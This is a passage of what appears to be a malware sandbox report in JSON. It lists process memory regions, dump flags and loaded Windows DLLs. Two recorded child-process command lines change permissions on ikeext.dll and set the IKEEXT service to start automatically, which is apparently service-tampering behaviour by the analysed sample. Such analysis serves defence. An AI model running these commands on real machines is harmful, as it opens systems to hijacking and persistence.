"flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1908735, "entry_point": 0, "filename": null, "id": "region_1125", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:00:48.013", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000012-region_00001126-addr_0x00000000001e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_223", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_1126", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:00:48.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000012-region_00001127-addr_0x0000000000200000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_224", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_1127", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:48.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 5574655, "entry_point": 0, "filename": null, "id": "region_1128", "name": "pagefile_0x0000000000450000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4521984, "timestamp": "00:00:48.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 18219007, "entry_point": 0, "filename": null, "id": "region_1129", "name": "pagefile_0x0000000000560000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5636096, "timestamp": "00:00:48.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 18219008, "type": "region", "version": 1 }, "end_va": 19673087, "entry_point": 0, "filename": null, "id": "region_1130", "name": "pagefile_0x0000000001160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18219008, "timestamp": "00:00:48.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19726336, "type": "region", "version": 1 }, "end_va": 22671359, "entry_point": 19726336, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1131", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19726336, "timestamp": "00:00:48.037", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F\"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_14", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 14, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000014-region_00001158-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_233", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1158", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:48.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1159", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:48.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1160", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:48.258", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000014-region_00001161-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_234", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_1161", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:48.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1239744512, "type": "region", "version": 1 }, "end_va": 1240055807, "entry_point": 1239777946, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_1162", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239744512, "timestamp": "00:00:48.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1163", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:48.259", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1164", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:48.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1165", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:48.262", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000014-region_00001166-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_235", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_1166", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:00:48.263", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000014-region_00001167-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_236", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1167", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:48.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1168", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:48.289", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1169", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:48.289", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1170", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:48.289", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000014-region_00001171-addr_0x0000000000400000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_237", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_1171", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:00:48.290", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000014-region_00001172-addr_0x0000000000670000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_238", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 6815743, "entry_point": 0, "filename": null, "id": "region_1172", "name": "private_0x0000000000670000", "norm_filename": null, "region_type": "private_memory", "start_va": 6750208, "timestamp": "00:00:48.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914372096, "type": "region", "version": 1 }, "end_va": 1914400767, "entry_point": 1914376752, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_1173", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1914372096, "timestamp": "00:00:48.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1174", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:48.291", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1175", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:48.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1176", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:48.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1177", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:48.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1178", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:48.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1179", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:48.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1180", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:48.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1181", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:48.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 1605631, "entry_point": 0, "filename": null, "id": "region_1182", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:48.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1183", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:48.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1184", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:48.300", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1667071, "entry_point": 0, "filename": null, "id": "region_1185", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:00:48.304", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1712127, "entry_point": 0, "filename": null, "id": "region_1186", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:00:48.304", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000014-region_00001187-addr_0x00000000001b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_239", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_1187", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:48.305", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000014-region_00001188-addr_0x00000000001c0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_240", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_1188", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:48.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 6295551, "entry_point": 0, "filename": null, "id": "region_1189", "name": "pagefile_0x0000000000500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5242880, "timestamp": "00:00:48.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 19398655, "entry_point": 0, "filename": null, "id": "region_1190", "name": "pagefile_0x0000000000680000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6815744, "timestamp": "00:00:48.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 19398656, "type": "region", "version": 1 }, "end_va": 20852735, "entry_point": 0, "filename": null, "id": "region_1191", "name": "pagefile_0x0000000001280000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19398656, "timestamp": "00:00:48.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 20905984, "type": "region", "version": 1 }, "end_va": 23851007, "entry_point": 20905984, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1192", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 20905984, "timestamp": "00:00:48.328", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\system32\\cmd.exe /c \"sc config ikeext start= auto\"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_16", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 16, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000016-region_00001219-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_249", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1219", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:48.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1220", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:48.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1221", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:48.422", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000016-region_00001222-addr_0x00000000001b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_250", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 0, "filename": null, "id": "region_1222", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:48.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1239744512, "type": "region", "version": 1 }, "end_va": 1240055807, "entry_point": 1239777946, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_1223", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239744512, "timestamp": "00:00:48.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1224", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:48.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1225", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:48.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1226", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:48.429", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000016-region_00001227-addr_0x000000007ffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_251", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147311616, "type": "region", "version": 1 }, "end_va": 2147315711, "entry_point": 0, "filename": null, "id": "region_1227", "name": "private_0x000000007ffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147311616, "timestamp": "00:00:48.429", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000016-region_00001228-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_252", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1228", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:48.429", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1229", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:48.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1230", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:48.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1231", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:48.450", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000016-region_00001232-addr_0x00000000003b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_253", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_1232", "name": 